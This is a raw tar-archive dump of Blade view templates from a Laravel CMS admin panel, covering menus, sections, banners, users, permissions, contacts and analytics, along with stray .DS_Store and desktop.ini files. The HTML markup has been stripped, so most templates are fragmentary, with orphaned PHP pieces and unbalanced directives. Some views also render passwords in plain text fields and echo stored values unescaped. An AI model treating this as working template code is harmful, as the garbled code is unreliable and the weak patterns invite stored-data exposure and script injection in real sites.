.DS_Store000064400000014004147565226250006244 0ustar00Bud1%  @ @ @ @ E%DSDB` @ @ @views/vendor/translation-manager/.gitkeep000064400000000000147565226250014601 0ustar00views/vendor/translation-manager/index.php000064400000056064147565226250015015 0ustar00 Translation Manager

Translation Manager

Warning, translations are not visible until they are exported back to the app/lang file, using 'php artisan translation:export' command or publish button.


" data-remote="true" role="form" data-confirm="Are you sure you want to scan you app folder? All found translation keys will be added to the database.">

*/ ?>
Back


Total: , changed:

$translation): ?>
Key  
" id="username" data-type="textarea" data-pk="id : 0 ?>" data-url="" data-title="Enter translation">value, ENT_QUOTES, 'UTF-8', false) : '' ?>

Choose a group to display the group translations. If no groups are visible, make sure you have run the migrations and imported the translations.

views/vendor/translation-manager/desktop.ini000064400000000216147565226250015333 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 views/vendor/desktop.ini000064400000000216147565226250011365 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 views/backEnd/menus.blade.php000064400000055275147565226250012172 0ustar00@extends('backEnd.layout') @section('content') @foreach($ParentMenus as $ParentMenu) @endforeach id; } catch (Exception $e) { $edt_id = 0; } $edt_title = ""; ?>
@if($Menus->total() >0) @endif @if($Menus->total() == 0)
{{ trans('backLang.noData') }}
@if(count($ParentMenus)>0)
  {{ trans('backLang.newLink') }} @endif
@endif @if($Menus->total() > 0) {{Form::open(['route'=>'menusUpdateAll','id'=>'menusUpdateAll','method'=>'post'])}} {!! Form::hidden('ParentMenuId',$edt_id) !!}
@foreach($Menus as $Menu) $title_var != "") { $title = $Menu->$title_var; } else { $title = $Menu->$title_var2; } ?> @foreach($Menu->subMenus as $subMenu) $title_var != "") { $title = $subMenu->$title_var; } else { $title = $subMenu->$title_var2; } ?> @endforeach @endforeach
{{ trans('backLang.fullName') }} {{ trans('backLang.status') }} {{ trans('backLang.options') }}
{!! Form::text('row_no_'.$Menu->id,$Menu->row_no, array('class' => 'form-control row_no','id'=>'row_no')) !!} {!! $title !!} $edt_id,"id"=>$Menu->id]) }}"> {{ trans('backLang.edit') }}
{!! Form::text('row_no_'.$subMenu->id,$subMenu->row_no, array('class' => 'form-control row_no','id'=>'row_no')) !!} {!! $title !!} $edt_id,"id"=>$subMenu->id]) }}"> {{ trans('backLang.edit') }}
{{ trans('backLang.showing') }} {{ $Menus->firstItem() }} -{{ $Menus->lastItem() }} {{ trans('backLang.of') }} {{ $Menus->total() }} {{ trans('backLang.records') }}
{!! $Menus->links() !!}
{{Form::close()}} @endif
@endsection @section('footerInclude') @endsection views/backEnd/sections/edit.blade.php000064400000115340147565226250013605 0ustar00@extends('backEnd.layout') @section('headerInclude') @endsection @section('content')
@endsection @section('footerInclude') @endsectionviews/backEnd/sections/create.blade.php000064400000017330147565226250014123 0ustar00@extends('backEnd.layout') @section('headerInclude') @endsection @section('content')
{{Form::open(['route'=>['sectionsStore',$WebmasterSection->id],'method'=>'POST', 'files' => true ])}} @if($WebmasterSection->sections_status==2)
@else {!! Form::hidden('father_id','0') !!} @endif @if(Helper::GeneralWebmasterSettings("ar_box_status"))
{!! Form::text('title_ar','', array('placeholder' => '','class' => 'form-control','id'=>'title_ar','required'=>'', 'dir'=>trans('backLang.rtl'))) !!}
@endif @if(Helper::GeneralWebmasterSettings("he_box_status"))
{!! Form::text('title_he','', array('placeholder' => '','class' => 'form-control','id'=>'title_he','required'=>'', 'dir'=>trans('backLang.rtl'))) !!}
@endif @if(Helper::GeneralWebmasterSettings("en_box_status"))
{!! Form::text('title_en','', array('placeholder' => '','class' => 'form-control','id'=>'title_en','required'=>'', 'dir'=>trans('backLang.ltr'))) !!}
@endif
{!! Form::file('photo', array('class' => 'form-control','id'=>'photo','accept'=>'image/*')) !!}
{!! trans('backLang.imagesTypes') !!}
@if($WebmasterSection->section_icon_status)
{!! Form::text('icon','', array('placeholder' => '','class' => 'form-control icp icp-auto','id'=>'icon', 'data-placement'=>'bottomRight')) !!}
@endif
{!! trans('backLang.cancel') !!}
{{Form::close()}}
@endsection @section('footerInclude') @endsection views/backEnd/sections/desktop.ini000064400000000216147565226250013246 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 views/backEnd/sections.blade.php000064400000047147147565226250012671 0ustar00@extends('backEnd.layout') @section('content')
@if($Sections->total() > 0) @if(@Auth::user()->permissionsGroup->add_status) @endif @endif @if($Sections->total() == 0)
{{ trans('backLang.noData') }}

@if(@Auth::user()->permissionsGroup->add_status) id)}}">   {{ trans('backLang.sectionNew') }} @endif
@endif @if($Sections->total() > 0) {{Form::open(['route'=>['sectionsUpdateAll',$WebmasterSection->id],'method'=>'post'])}}
@foreach($Sections as $Section) $title_var != "") { $title = $Section->$title_var; } else { $title = $Section->$title_var2; } ?> @foreach($Section->fatherSections as $subSection) $title_var != "") { $title = $subSection->$title_var; } else { $title = $subSection->$title_var2; } ?> @endforeach @endforeach
{{ trans('backLang.sectionName') }} {{ trans('backLang.contents') }} {{ trans('backLang.visits') }} {{ trans('backLang.status') }} {{ trans('backLang.options') }}
@if($Section->photo !="")
{{ $title }}
@endif {!! Form::text('row_no_'.$Section->id,$Section->row_no, array('class' => 'form-control row_no','id'=>'row_no')) !!} @if($Section->icon !="") @endif {{ $title }}
{!! count($Section->topics) !!} {!! $Section->visits !!} @if(@Auth::user()->permissionsGroup->edit_status) $WebmasterSection->id,"id"=>$Section->id]) }}"> {{ trans('backLang.edit') }} @endif @if(@Auth::user()->permissionsGroup->delete_status) @endif
@if($subSection->photo !="")
{{ $title }}
@endif {!! Form::text('row_no_'.$subSection->id,$subSection->row_no, array('class' => 'form-control row_no','id'=>'row_no')) !!} @if($subSection->icon !="") @endif {!! $title !!}
{!! $subSection->visits !!} {!! $subSection->visits !!} @if(@Auth::user()->permissionsGroup->edit_status) $WebmasterSection->id,"id"=>$subSection->id]) }}"> {{ trans('backLang.edit') }} @endif @if(@Auth::user()->permissionsGroup->delete_status) @endif
{{ trans('backLang.showing') }} {{ $Sections->firstItem() }} -{{ $Sections->lastItem() }} {{ trans('backLang.of') }} {{ $Sections->total() }} {{ trans('backLang.records') }}
{!! $Sections->links() !!}
{{Form::close()}} @endif
@endsection @section('footerInclude') @endsection views/backEnd/analytics.blade.php000064400000031445147565226250013023 0ustar00@extends('backEnd.layout') @section('headerInclude') @endsection @section('content')

{{ trans('backLang.visitorsAnalytics') }} [ {{ trans('backLang.'.$statText) }} ]

{{Form::open(['route'=>['analyticsFilter',$stat],'method'=>'POST', 'id' => "form_ofchangedate" ])}}
"/> "/> {{Form::close()}}

{{ $TotalVisitors }}

{{ trans('backLang.visitors') }}

{{ $TotalPages }}

{{ trans('backLang.pageViews') }}

{{ trans('backLang.diagram') }}

{{ trans('backLang.barDiagram') }}
@foreach($AnalyticsValues as $id) @if($ii<=60) @foreach($id as $key => $val) 80) { $val0 = $val; $val = substr($val, 0, 80) . ".."; ?> @endforeach @endif @endforeach
# {{ trans('backLang.'.$statText) }} {{ trans('backLang.visitors') }} {{ trans('backLang.pageViews') }}
{{$ii}} {{ $val }} {{ $val }} {{ $val }}
@endsection @section('footerInclude') @endsection views/backEnd/users.blade.php000064400000027630147565226250012176 0ustar00@extends('backEnd.layout') @section('content') @if(@Auth::user()->permissionsGroup->webmaster_status) @include('backEnd.users.permissions.view') @endif
@if($Users->total() >0) @if(@Auth::user()->permissionsGroup->webmaster_status) @endif @endif @if($Users->total() == 0)
{{ trans('backLang.noData') }}
@if(@Auth::user()->permissionsGroup->webmaster_status)
  {{ trans('backLang.newUser') }} @endif
@endif @if($Users->total() > 0) {{Form::open(['route'=>'usersUpdateAll','method'=>'post'])}}
@foreach($Users as $User) @endforeach
{{ trans('backLang.fullName') }} {{ trans('backLang.loginEmail') }} {{ trans('backLang.Permission') }} {{ trans('backLang.status') }} {{ trans('backLang.options') }}
{!! $User->name !!} {!! $User->email !!} {{$User->permissionsGroup->name}} $User->id]) }}"> {{ trans('backLang.edit') }} @if(@Auth::user()->permissionsGroup->webmaster_status) @endif
{{ trans('backLang.showing') }} {{ $Users->firstItem() }} -{{ $Users->lastItem() }} {{ trans('backLang.of') }} {{ $Users->total() }} {{ trans('backLang.records') }}
{!! $Users->links() !!}
{{Form::close()}} @endif
@endsection @section('footerInclude') @endsection views/backEnd/banners/edit.blade.php000064400000053771147565226250013417 0ustar00@extends('backEnd.layout') @section('headerInclude') @endsection @section('content')

{{ trans('backLang.bannerEdit') }}

{{ trans('backLang.home') }} / {{ trans('backLang.adsBanners') }}
{{Form::open(['route'=>['BannersUpdate',$Banners->id],'method'=>'POST', 'files' => true])}} {!! Form::hidden('section_id',$Banners->section_id) !!} @if(Helper::GeneralWebmasterSettings("ar_box_status"))
{!! Form::text('title_ar',$Banners->title_ar, array('placeholder' => '','class' => 'form-control','id'=>'title_ar','required'=>'', 'dir'=>trans('backLang.rtl'))) !!}
@endif @if(Helper::GeneralWebmasterSettings("he_box_status"))
{!! Form::text('title_he',$Banners->title_he, array('placeholder' => '','class' => 'form-control','id'=>'title_he','required'=>'', 'dir'=>trans('backLang.rtl'))) !!}
@endif @if(Helper::GeneralWebmasterSettings("en_box_status"))
{!! Form::text('title_en',$Banners->title_en, array('placeholder' => '','class' => 'form-control','id'=>'title_en','required'=>'', 'dir'=>trans('backLang.ltr'))) !!}
@endif @if($WebmasterBanner->type==2)
       
@endif @if($WebmasterBanner->type!=0) @if($WebmasterBanner->type==1) @else @endif
@if(Helper::GeneralWebmasterSettings("ar_box_status"))
@if($Banners->file_ar!="") @if($WebmasterBanner->type==1) @else {!! $Banners->file_ar !!} @endif @endif {!! Form::file($file1, array('class' => 'form-control','id'=>'file_ar','accept'=>$file_allow)) !!}
@endif @if(Helper::GeneralWebmasterSettings("he_box_status"))
@if($Banners->file_he!="") @if($WebmasterBanner->type==1) @else {!! $Banners->file_he !!} @endif @endif {!! Form::file($file3, array('class' => 'form-control','id'=>'file_he','accept'=>$file_allow)) !!}
@endif @if(Helper::GeneralWebmasterSettings("en_box_status"))
@if($Banners->file_en!="") @if($WebmasterBanner->type==1) @else {!! $Banners->file_en !!} @endif @endif {!! Form::file($file2, array('class' => 'form-control','id'=>'file_en','accept'=>$file_allow)) !!}
@endif
@if($WebmasterBanner->type==1) {!! trans('backLang.imagesTypes') !!} @else {!! trans('backLang.videoTypes') !!} @endif
@endif @if($WebmasterBanner->desc_status) @if(Helper::GeneralWebmasterSettings("ar_box_status"))
{!! Form::textarea('details_ar',$Banners->details_ar, array('placeholder' => '','class' => 'form-control', 'dir'=>trans('backLang.rtl'),'rows'=>'3')) !!}
@endif @if(Helper::GeneralWebmasterSettings("he_box_status"))
{!! Form::textarea('details_he',$Banners->details_he, array('placeholder' => '','class' => 'form-control', 'dir'=>trans('backLang.rtl'),'rows'=>'3')) !!}
@endif @if(Helper::GeneralWebmasterSettings("en_box_status"))
{!! Form::textarea('details_en',$Banners->details_en, array('placeholder' => '','class' => 'form-control', 'dir'=>trans('backLang.ltr'),'rows'=>'3')) !!}
@endif @endif @if($WebmasterBanner->link_status)
{!! Form::text('link_url',$Banners->link_url, array('placeholder' => 'http://www.site.com','class' => 'form-control','id'=>'link_url', 'dir'=>trans('backLang.ltr'))) !!}
@endif @if($WebmasterBanner->type==0)
{!! Form::textarea('code',$Banners->code, array('placeholder' => '','class' => 'form-control', 'dir'=>trans('backLang.ltr'),'rows'=>'3')) !!}
@endif @if($WebmasterBanner->icon_status)
{!! Form::text('icon',$Banners->icon, array('placeholder' => '','class' => 'form-control icp icp-auto','id'=>'icon', 'data-placement'=>'bottomRight')) !!}
@endif
   
{!! trans('backLang.cancel') !!}
{{Form::close()}}
@endsection @section('footerInclude') @endsection views/backEnd/banners/create.blade.php000064400000040343147565226250013724 0ustar00@extends('backEnd.layout') @section('headerInclude') @endsection @section('content')

{{ trans('backLang.bannerAdd') }}

{{ trans('backLang.home') }} / {{ trans('backLang.adsBanners') }}
{{Form::open(['route'=>['BannersStore'],'method'=>'POST', 'files' => true ])}} {!! Form::hidden('section_id',$WebmasterBanner->id) !!} @if(Helper::GeneralWebmasterSettings("ar_box_status"))
{!! Form::text('title_ar','', array('placeholder' => '','class' => 'form-control','id'=>'title_ar','required'=>'', 'dir'=>trans('backLang.rtl'))) !!}
@endif @if(Helper::GeneralWebmasterSettings("he_box_status"))
{!! Form::text('title_he','', array('placeholder' => '','class' => 'form-control','id'=>'title_he','required'=>'', 'dir'=>trans('backLang.rtl'))) !!}
@endif @if(Helper::GeneralWebmasterSettings("en_box_status"))
{!! Form::text('title_en','', array('placeholder' => '','class' => 'form-control','id'=>'title_en','required'=>'', 'dir'=>trans('backLang.ltr'))) !!}
@endif @if($WebmasterBanner->type==2)
       
@endif @if($WebmasterBanner->type!=0) @if($WebmasterBanner->type==1) @else @endif
@if(Helper::GeneralWebmasterSettings("ar_box_status"))
{!! Form::file($file1, array('class' => 'form-control','id'=>'file_ar','accept'=>$file_allow)) !!}
@endif @if(Helper::GeneralWebmasterSettings("he_box_status"))
{!! Form::file($file3, array('class' => 'form-control','id'=>'file_he','accept'=>$file_allow)) !!}
@endif @if(Helper::GeneralWebmasterSettings("en_box_status"))
{!! Form::file($file2, array('class' => 'form-control','id'=>'file_en','accept'=>$file_allow)) !!}
@endif
@if($WebmasterBanner->type==1) {!! trans('backLang.imagesTypes') !!} @else {!! trans('backLang.videoTypes') !!} @endif
@endif @if($WebmasterBanner->desc_status) @if(Helper::GeneralWebmasterSettings("ar_box_status"))
{!! Form::textarea('details_ar','', array('placeholder' => '','class' => 'form-control', 'dir'=>trans('backLang.rtl'),'rows'=>'3')) !!}
@endif @if(Helper::GeneralWebmasterSettings("he_box_status"))
{!! Form::textarea('details_he','', array('placeholder' => '','class' => 'form-control', 'dir'=>trans('backLang.rtl'),'rows'=>'3')) !!}
@endif @if(Helper::GeneralWebmasterSettings("en_box_status"))
{!! Form::textarea('details_en','', array('placeholder' => '','class' => 'form-control', 'dir'=>trans('backLang.ltr'),'rows'=>'3')) !!}
@endif @endif @if($WebmasterBanner->link_status)
{!! Form::text('link_url','', array('placeholder' => 'http://www.site.com','class' => 'form-control','id'=>'link_url', 'dir'=>trans('backLang.ltr'))) !!}
@endif @if($WebmasterBanner->type==0)
{!! Form::textarea('code','', array('placeholder' => '','class' => 'form-control', 'dir'=>trans('backLang.ltr'),'rows'=>'3')) !!}
@endif @if($WebmasterBanner->icon_status)
{!! Form::text('icon','', array('placeholder' => '','class' => 'form-control icp icp-auto','id'=>'icon', 'data-placement'=>'bottomRight')) !!}
@endif
{!! trans('backLang.cancel') !!}
{{Form::close()}}
@endsection @section('footerInclude') @endsection views/backEnd/banners/desktop.ini000064400000000216147565226250013047 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 views/backEnd/layout.blade.php000064400000001751147565226250012346 0ustar00 @include('backEnd.includes.head') @yield('headerInclude')
@include('backEnd.includes.menu')
@include('backEnd.includes.header') @include('backEnd.includes.footer')
@include('backEnd.includes.errors') @yield('content')
@include('backEnd.includes.settings')
@include('backEnd.includes.foot') @yield('footerInclude') views/backEnd/contacts.blade.php000064400000132307147565226250012651 0ustar00@extends('backEnd.layout') @section('content')

@if($Contacts->total() > 0)
{{Form::open(['route'=>['contactsSearch'],'method'=>'POST'])}}
{{Form::close()}}
@if($Contacts->total() > env('BACKEND_PAGINATION'))
{!! $Contacts->links() !!}
@endif
@endif @if(Session::has('ContactToEdit'))
@if(Session::has('doneMessage2'))
{{ Session::get('doneMessage2') }}
@endif {{Form::open(['route'=>['contactsUpdate',Session::get('ContactToEdit')->id],'method'=>'POST', 'files' => true])}}
@if(Session::get('ContactToEdit')->photo !="") @else @endif
{!! Form::text('first_name',Session::get('ContactToEdit')->first_name, array('placeholder' =>trans('backLang.firstName'),'class' => 'form-control w-sm inline','id'=>'first_name','required'=>'')) !!} {!! Form::text('last_name',Session::get('ContactToEdit')->last_name, array('placeholder' =>trans('backLang.lastName'),'class' => 'form-control w-sm inline','id'=>'last_name','required'=>'')) !!} @if(count($ContactsGroups) >0) @endif
{!! Form::text('phone',Session::get('ContactToEdit')->phone, array('placeholder' =>'','class' => 'form-control','id'=>'phone')) !!}
@if(Session::get('ContactToEdit')->phone !="") @endif
{!! Form::email('email',Session::get('ContactToEdit')->email, array('placeholder' =>'','class' => 'form-control','id'=>'email','required'=>'')) !!}
{!! Form::text('company',Session::get('ContactToEdit')->company, array('placeholder' =>'','class' => 'form-control','id'=>'company')) !!}
{!! Form::text('city',Session::get('ContactToEdit')->city, array('placeholder' =>trans('backLang.city'),'class' => 'form-control','id'=>'city')) !!}
{!! Form::textarea('notes',Session::get('ContactToEdit')->notes, array('placeholder' => '','class' => 'form-control','rows'=>'3')) !!}
       
@if(@Auth::user()->permissionsGroup->delete_status) @endif
{{Form::close()}}
@else
{{Form::open(['route'=>['contactsStore'],'method'=>'POST', 'files' => true ])}}
{!! Form::text('first_name','', array('placeholder' =>trans('backLang.firstName'),'class' => 'form-control w-sm inline','id'=>'first_name','required'=>'')) !!} {!! Form::text('last_name','', array('placeholder' =>trans('backLang.lastName'),'class' => 'form-control w-sm inline','id'=>'last_name','required'=>'')) !!} @if(count($ContactsGroups) >0) @endif
{!! Form::text('phone','', array('placeholder' =>'','class' => 'form-control','id'=>'phone')) !!}
{!! Form::email('email','', array('placeholder' =>'','class' => 'form-control','id'=>'email','required'=>'')) !!}
{!! Form::text('company','', array('placeholder' =>'','class' => 'form-control','id'=>'company')) !!}
{!! Form::text('city','', array('placeholder' =>'','class' => 'form-control','id'=>'city')) !!}
{!! Form::textarea('notes','', array('placeholder' => '','class' => 'form-control','rows'=>'3')) !!}
{{Form::close()}}
@endif
@endsection @section('footerInclude') @endsection views/backEnd/search.blade.php000064400000031031147565226250012270 0ustar00@extends('backEnd.layout') @section('content')
{{Form::open(['route'=>['adminFind'],'method'=>'POST', 'class' => "m-b-md" ])}}
{{Form::close()}}

{{ $totalcount = count($Topics) + count($Sections) + count($Contacts) + count($Events) + count($Webmails) }} {{ trans('backLang.resultsFoundFor') }} : {{ $search_word }}

@if(count($Topics)>0)
@foreach($Topics as $Topic) $title_var != "") { $title = $Topic->$title_var; } else { $title = $Topic->$title_var2; } $section = ""; try { if ($Topic->section->$title_var != "") { $section = $Topic->section->$title_var; } else { $section = $Topic->section->$title_var2; } } catch (Exception $e) { $section = ""; } if (strlen(stripcslashes(strip_tags($Topic->$details_var))) > 300) { $details = mb_substr(stripcslashes(strip_tags($Topic->$details_var)), 0, 300, 'UTF-8') . "..."; } else { $details = stripcslashes(strip_tags($Topic->$details_var)); } ?>
@endforeach
@endif @if(count($Sections)>0)
@endif @if(count($Contacts)>0) @endif @if(count($Events)>0)
@foreach($Events as $Event)
  • @if($Event->type ==3 || $Event->type ==2) {{ date('d M Y h:i A', strtotime($Event->start_date)) }} @else {{ date('d M Y', strtotime($Event->start_date)) }} @endif
    $Event->id]) }}">{{ $Event->title }}

    {!! nl2br($Event->details) !!}

@endforeach
@endif @if(count($Webmails)>0)
@foreach($Webmails as $Webmail) details))) > 300) { $details = mb_substr(stripcslashes(strip_tags($Webmail->details)), 0, 300, 'UTF-8') . "..."; } else { $details = stripcslashes(strip_tags($Webmail->details)); } ?>
@endforeach
@endif
@endsection views/backEnd/users/permissions/edit.blade.php000064400000032237147565226250015475 0ustar00@extends('backEnd.layout') @section('content')
{{Form::open(['route'=>['permissionsUpdate',$Permissions->id],'method'=>'POST'])}}
{!! Form::text('name',$Permissions->name, array('placeholder' => '','class' => 'form-control','id'=>'name','required'=>'')) !!}

@foreach($GeneralWebmasterSections as $WebmasterSection) data_sections); ?>
@endforeach



   
{!! trans('backLang.cancel') !!}
{{Form::close()}}
@endsection views/backEnd/users/permissions/view.blade.php000064400000021330147565226250015512 0ustar00

{{ trans('backLang.permissions') }}

{{ trans('backLang.home') }} / {{ trans('backLang.settings') }}
@if(count($Permissions) >0) @endif @if(count($Permissions) == 0) @endif @if(count($Permissions) > 0)
@foreach($Permissions as $Permission) @endforeach
{{ trans('backLang.title') }} {{ trans('backLang.permissions') }} {{ trans('backLang.status') }} {{ trans('backLang.options') }}
{!! $Permission->name !!} @if($Permission->add_status==1) {{ trans('backLang.perAdd') }}   @endif @if($Permission->edit_status==1) {{ trans('backLang.perEdit') }}   @endif @if($Permission->delete_status==1) {{ trans('backLang.perDelete') }}   @endif @if($Permission->add_status==0 && $Permission->edit_status==0 && $Permission->delete_status==0) {{ trans('backLang.viewOnly') }}   @endif
@if($Permission->analytics_status==1) {{ trans('backLang.visitorsAnalytics') }}, @endif @if($Permission->newsletter_status==1) {{ trans('backLang.newsletter') }}, @endif @if($Permission->inbox_status==1) {{ trans('backLang.siteInbox') }}, @endif @if($Permission->calendar_status==1) {{ trans('backLang.calendar') }}, @endif @if($Permission->banners_status==1) {{ trans('backLang.adsBanners') }}, @endif @if($Permission->settings_status==1) {{ trans('backLang.generalSettings') }}, @endif @if($Permission->webmaster_status==1) {{ trans('backLang.webmasterTools') }}, @endif
@foreach($GeneralWebmasterSections as $WebmasterSection) data_sections); ?> @if(in_array($WebmasterSection->id,$data_sections_arr) && $i!=0) , @endif {!! (in_array($WebmasterSection->id,$data_sections_arr)) ? trans('backLang.'.$WebmasterSection->name):"" !!} @endforeach
$Permission->id]) }}"> {{ trans('backLang.edit') }}
@endif
views/backEnd/users/permissions/create.blade.php000064400000026226147565226250016014 0ustar00@extends('backEnd.layout') @section('content')
{{Form::open(['route'=>['permissionsStore'],'method'=>'POST'])}}
{!! Form::text('name','', array('placeholder' => '','class' => 'form-control','id'=>'name','required'=>'')) !!}

@foreach($GeneralWebmasterSections as $WebmasterSection)
@endforeach



{!! trans('backLang.cancel') !!}
{{Form::close()}}
@endsection views/backEnd/users/permissions/desktop.ini000064400000000216147565226250015133 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 views/backEnd/users/edit.blade.php000064400000023053147565226250013116 0ustar00@extends('backEnd.layout') @section('content')
{{Form::open(['route'=>['usersUpdate',$Users->id],'method'=>'POST', 'files' => true])}}
{!! Form::text('name',$Users->name, array('placeholder' => '','class' => 'form-control','id'=>'name','required'=>'')) !!}
{!! Form::email('email',$Users->email, array('placeholder' => '','class' => 'form-control','id'=>'email','required'=>'')) !!}
{!! Form::text('password','', array('placeholder' => '','class' => 'form-control','id'=>'password')) !!}
@if($Users->photo!="")
{!! Form::hidden('photo_delete','0', array('id'=>'photo_delete')) !!}
@endif {!! Form::file('photo', array('class' => 'form-control','id'=>'photo','accept'=>'image/*')) !!} {!! trans('backLang.imagesTypes') !!}
@if(@Auth::user()->permissionsGroup->webmaster_status)
   
@else {!! Form::hidden('permissions_id',$Users->permissions_id) !!} {!! Form::hidden('status',$Users->status) !!} @endif
{{ trans('backLang.connectEmailToConnect') }}
{!! Form::email('connect_email',$Users->connect_email, array('placeholder' => '','class' => 'form-control','id'=>'connect_email')) !!}
{!! Form::text('connect_password',$Users->connect_password, array('placeholder' => '','class' => 'form-control','id'=>'connect_password')) !!}
{!! Form::checkbox('get_notifications','1',$Users->get_notifications,['class' => 'ui-check ui-check-md','id'=>'get_notifications']) !!}
{!! trans('backLang.cancel') !!}
{{Form::close()}}
@endsection views/backEnd/users/create.blade.php000064400000013666147565226250013445 0ustar00@extends('backEnd.layout') @section('content')
{{Form::open(['route'=>['usersStore'],'method'=>'POST', 'files' => true ])}}
{!! Form::text('name','', array('placeholder' => '','class' => 'form-control','id'=>'name','required'=>'')) !!}
{!! Form::email('email','', array('placeholder' => '','class' => 'form-control','id'=>'email','required'=>'')) !!}
{!! Form::text('password','', array('placeholder' => '','class' => 'form-control','id'=>'password','required'=>'')) !!}
{!! Form::file('photo', array('class' => 'form-control','id'=>'photo','accept'=>'image/*')) !!} {!! trans('backLang.imagesTypes') !!}
{{ trans('backLang.connectEmailToConnect') }}
{!! Form::email('connect_email','', array('placeholder' => '','class' => 'form-control','id'=>'connect_email')) !!}
{!! Form::text('connect_password','', array('placeholder' => '','class' => 'form-control','id'=>'connect_password')) !!}
{!! Form::checkbox('get_notifications','1',null,['class' => 'ui-check ui-check-md','id'=>'get_notifications']) !!}
{!! trans('backLang.cancel') !!}
{{Form::close()}}
@endsection views/backEnd/users/desktop.ini000064400000000216147565226250012560 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 views/backEnd/webmaster/sections/edit.blade.php000064400000352160147565226250015601 0ustar00@extends('backEnd.layout') @section('content')

{{ trans('backLang.sectionEdit') }}

{{ trans('backLang.home') }} / {{ trans('backLang.webmasterTools') }} / {{ trans('backLang.siteSectionsSettings') }}
@endsection @section('footerInclude') @endsection views/backEnd/webmaster/sections/create.blade.php000064400000056337147565226260016127 0ustar00@extends('backEnd.layout') @section('content')

{{ trans('backLang.sectionNew') }}

{{ trans('backLang.home') }} / {{ trans('backLang.webmasterTools') }} / {{ trans('backLang.siteSectionsSettings') }}
{{Form::open(['route'=>['WebmasterSectionsStore'],'method'=>'POST'])}}
{!! Form::text('name','', array('placeholder' => trans('backLang.langVar'),'class' => 'form-control','id'=>'name','required'=>'')) !!}


   
   
   
   
   
   
   


   
   
   
   
   
   
   
   

{!! trans('backLang.cancel') !!}
{{Form::close()}}
@endsection views/backEnd/webmaster/sections/desktop.ini000064400000000216147565226260015240 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 views/backEnd/webmaster/sections.blade.php000064400000031051147565226260014646 0ustar00@extends('backEnd.layout') @section('content')

{{ trans('backLang.siteSectionsSettings') }}

{{ trans('backLang.home') }} / {{ trans('backLang.webmasterTools') }} / {{ trans('backLang.siteSectionsSettings') }}
@if($WebmasterSections->total() == 0)
{{ trans('backLang.noData') }}
@endif @if($WebmasterSections->total() > 0) {{Form::open(['route'=>'WebmasterSectionsUpdateAll','method'=>'post'])}}
@foreach($WebmasterSections as $WebmasterSection) @endforeach
{{ trans('backLang.sectionName') }} {{ trans('backLang.sectionType') }} {{ trans('backLang.hasCategories') }} {{ trans('backLang.status') }} {{ trans('backLang.options') }}
{!! Form::text('row_no_'.$WebmasterSection->id,$WebmasterSection->row_no, array('class' => 'form-control row_no','id'=>'row_no')) !!} {!! str_replace("backLang.","",trans('backLang.'.$WebmasterSection->name)) !!} {!! ($WebmasterSection->type==3) ? " ".trans('backLang.typeSounds')."":"" !!} {!! ($WebmasterSection->type==2) ? " ".trans('backLang.typeVideos')."":"" !!} {!! ($WebmasterSection->type==1) ? " ".trans('backLang.typePhotos')."":"" !!} {!! ($WebmasterSection->type==0) ? " ".trans('backLang.typeTextPages')."":"" !!} {!! ($WebmasterSection->sections_status==2) ? " ".trans('backLang.mainAndSubCategories')."":"" !!} {!! ($WebmasterSection->sections_status==1) ? " ".trans('backLang.mainCategoriesOnly')."":"" !!} {!! ($WebmasterSection->sections_status==0) ? " ".trans('backLang.withoutCategories')."":"" !!} $WebmasterSection->id]) }}"> {{ trans('backLang.edit') }}
{{ trans('backLang.showing') }} {{ $WebmasterSections->firstItem() }} -{{ $WebmasterSections->lastItem() }} {{ trans('backLang.of') }} {{ $WebmasterSections->total() }} {{ trans('backLang.records') }}
{!! $WebmasterSections->links() !!}
{{Form::close()}} @endif
@endsection @section('footerInclude') @endsection views/backEnd/webmaster/banners/edit.blade.php000064400000022654147565226260015405 0ustar00@extends('backEnd.layout') @section('content')

{{ trans('backLang.sectionEdit') }}

{{ trans('backLang.home') }} / {{ trans('backLang.webmasterTools') }} / {{ trans('backLang.adsBannersSettings') }}
{{Form::open(['route'=>['WebmasterBannersUpdate',$WebmasterBanners->id],'method'=>'POST'])}}
{!! Form::text('name',$WebmasterBanners->name, array('placeholder' => trans('backLang.langVar'),'class' => 'form-control','id'=>'name','required'=>'')) !!}
       
{!! Form::number('width',$WebmasterBanners->width, array('placeholder' => trans('backLang.width'),'class' => 'form-control','id'=>'width','required'=>'','min'=>'0')) !!}
X
{!! Form::number('height',$WebmasterBanners->height, array('placeholder' => trans('backLang.height'),'class' => 'form-control','id'=>'height','required'=>'','min'=>'0')) !!}
PX
   
   
   
   
{!! trans('backLang.cancel') !!}
{{Form::close()}}
@endsection views/backEnd/webmaster/banners/create.blade.php000064400000017464147565226260015726 0ustar00@extends('backEnd.layout') @section('content')

{{ trans('backLang.sectionNew') }}

{{ trans('backLang.home') }} / {{ trans('backLang.webmasterTools') }} / {{ trans('backLang.adsBannersSettings') }}
{{Form::open(['route'=>['WebmasterBannersStore'],'method'=>'POST'])}}
{!! Form::text('name','', array('placeholder' => trans('backLang.langVar'),'class' => 'form-control','id'=>'name','required'=>'')) !!}
       
{!! Form::number('width','', array('placeholder' => trans('backLang.width'),'class' => 'form-control','id'=>'width','required'=>'','min'=>'0')) !!}
X
{!! Form::number('height','', array('placeholder' => trans('backLang.height'),'class' => 'form-control','id'=>'height','required'=>'','min'=>'0')) !!}
PX
   
   
   
{!! trans('backLang.cancel') !!}
{{Form::close()}}
@endsection views/backEnd/webmaster/banners/desktop.ini000064400000000216147565226260015041 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 views/backEnd/webmaster/settings.blade.php000064400000062105147565226260014663 0ustar00 @extends('backEnd.layout') @section('content')
